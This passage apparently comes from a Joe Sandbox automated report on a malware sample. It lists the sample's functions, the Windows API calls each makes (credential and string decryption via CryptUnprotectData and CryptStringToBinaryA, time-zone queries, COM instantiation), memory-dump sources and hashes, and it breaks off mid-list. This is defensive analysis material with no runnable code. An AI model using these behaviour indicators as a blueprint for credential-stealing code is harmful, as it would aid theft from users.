                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2`od$XEm=$^io${8i?
                              • API String ID: 0-410854099
                              • Opcode ID: ede723ac5364e4b9abeea174e8fcbcb40a382e8aed0370e09a7b2ed8da0dc69f
                              • Instruction ID: fe78a25da9c6c0708b6563ecfbf51201552dec6f5dc552e019a10ffb1ffec5e8
                              • Opcode Fuzzy Hash: ede723ac5364e4b9abeea174e8fcbcb40a382e8aed0370e09a7b2ed8da0dc69f
                              • Instruction Fuzzy Hash: B2B207F390C2049FE3046E2DEC8567AFBE9EF94720F1A4A3DEAC483744E67558058697
                              Function 001D8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,001C5184,40000001,00000000,00000000,?,001C5184), ref: 001D8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                              • Instruction ID: a7cf12613b4c50359fef73a6be71865e661c71ca11e12f8b6fcc98fa87c65483
                              • Opcode Fuzzy Hash: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                              • Instruction Fuzzy Hash: E8111575200209BFDB04DF64E884FAB33AAAF89304F109559F919CB350DB35EC51DB64
                              Function 001C9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                              • LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                              • Instruction ID: 607cd64af8a8b2a36ecf048b1535d01c43af8dfae916c054589213be2bd32b18
                              • Opcode Fuzzy Hash: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                              • Instruction Fuzzy Hash: D211A2B5240308BFEB10CF64DD95FAA77B5FB89704F208058F915AB390C7B6A911CB94
                              Function 001D7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014AE200,00000000,?,001E0E10,00000000,?,00000000,00000000), ref: 001D7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014AE200,00000000,?,001E0E10,00000000,?,00000000,00000000,?), ref: 001D7A7D
                              • wsprintfA.USER32 ref: 001D7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                              • Instruction ID: 0b40b9285c37234a04c1b47a21be190a19856535432bc3ba53c8acc7f1b36941
                              • Opcode Fuzzy Hash: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                              • Instruction Fuzzy Hash: 36118EB1A45218EBEB20DB54DD49FA9B778FB04721F1047AAE90AA32C0D7741A40CF51
                              Function 001D3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(001DE118,00000000,00000001,001DE108,00000000), ref: 001D3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001D37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                              • Instruction ID: 7f97fe5ee46e4443883450800fb95f9294fe1078f2ebc27362e32e31d16150b9
                              • Opcode Fuzzy Hash: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                              • Instruction Fuzzy Hash: 7941FB70A00A189FDB24DB58CC95B9BB7B4BB48702F4042D9E618E72D0D771AE85CF51
                              Function 001C9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                              • LocalFree.KERNEL32(?), ref: 001C9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 7d60616ea757a475fb58fe0985e9712b15ad581167c225e2c4d7e21e6a433552
                              • Instruction ID: 68814ce776e56c8254655b13ba027a80750c31adbbbf7cd6477148ede6a7211d
                              • Opcode Fuzzy Hash: 7d60616ea757a475fb58fe0985e9712b15ad581167c225e2c4d7e21e6a433552
                              • Instruction Fuzzy Hash: 6811C9B8A00209EFDB04DF94D989EAEB7B5FF88304F1045A8E915A7350D774AE10CFA1
                              Function 00598996 Relevance: 4.1, Strings: 2, Instructions: 1567COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: N`~.$w8~o
                              • API String ID: 0-623062728
                              • Opcode ID: d1b729b843906b63bf8021ad4ee565629d66dcb6790f25465a0de372ca6ad224
                              • Instruction ID: 5c7fd827cfe0edc05a87c75515abb4dc3d5fbe7ee83deb62b19749788762685d
                              • Opcode Fuzzy Hash: d1b729b843906b63bf8021ad4ee565629d66dcb6790f25465a0de372ca6ad224
                              • Instruction Fuzzy Hash: 0DB2F5F3A0C2049FE304AE2DEC8567AFBE9EF94720F1A492DE6C4C7744E63558058697
                              Function 004AD10D Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: O2q$g"j
                              • API String ID: 0-1449817455
                              • Opcode ID: 01ea12b7779dbd9a8dfc913e45f1d603ec399cac09f85235e719bc2c84a083c7
                              • Instruction ID: a798062fbcff879947c6ac289a131c65493766102f0e42b767775b01ffb7246a
                              • Opcode Fuzzy Hash: 01ea12b7779dbd9a8dfc913e45f1d603ec399cac09f85235e719bc2c84a083c7
                              • Instruction Fuzzy Hash: AC51C1B390C3149FE3116E6ADC8176AF7E9EF84720F1A493DDAC4D7340E6755C409A86
                              Function 00503FE9 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 39{
                              • API String ID: 0-1237294677
                              • Opcode ID: 85435a2dfa228bdd1d06a00b334052c2e351a922550b70f015c32e4259fcb9e8
                              • Instruction ID: 63c290594b87a2e3faedb2e744ae1533e9c2398d5206d70d5c57b1185e1b617e
                              • Opcode Fuzzy Hash: 85435a2dfa228bdd1d06a00b334052c2e351a922550b70f015c32e4259fcb9e8
                              • Instruction Fuzzy Hash: 7C5168F3A082145FE3146E3CEDD837AB7DAEB94720F1B423DDB8493784E93958058286
                              Function 0043CF2A Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fcee6f71bc6b36c8718b2430bcc608d9adb577d5efaeb8f86e61f95df809940b
                              • Instruction ID: 6defc6045eaa5d1f1c10f512c3af5c4c01f5d6eb5da187b9617e9e49a8f09f21
                              • Opcode Fuzzy Hash: fcee6f71bc6b36c8718b2430bcc608d9adb577d5efaeb8f86e61f95df809940b
                              • Instruction Fuzzy Hash: 415106F3F186108FF3185A69DC8076AB7D7EBD4321F2B853DDA8997384E9785C028685
                              Function 0042BC08 Relevance: .2, Instructions: 177COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b94ba8eb9fa7ec756655e1f15eb381e0e8644b3063c6d4c3b506787f1660b47f
                              • Instruction ID: a75b6db55685264a0b4ac7ec16ffca54066042aa5a0ce68b8f68e6ee423c61dc
                              • Opcode Fuzzy Hash: b94ba8eb9fa7ec756655e1f15eb381e0e8644b3063c6d4c3b506787f1660b47f
                              • Instruction Fuzzy Hash: 29518DF3A482009BF308AD3DEC9977B7BD5DB94360F1A863DDA85C7744F93899064192
                              Function 0047A1AF Relevance: .2, Instructions: 170COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab69d650f8b5f2d63e351cc8892ce6c9ad3957f611e1daa06556767b30b2d0dd
                              • Instruction ID: 037d1d03dfeecc1cd8a343bab1dfa916e74d1b5c8e774eaeba142a9f6b5683c4
                              • Opcode Fuzzy Hash: ab69d650f8b5f2d63e351cc8892ce6c9ad3957f611e1daa06556767b30b2d0dd
                              • Instruction Fuzzy Hash: 2751C5F3A187009BE708AF29DC8537EB7D6ABC4320F1A893DDAC993784D57958418687
                              Function 005109C4 Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
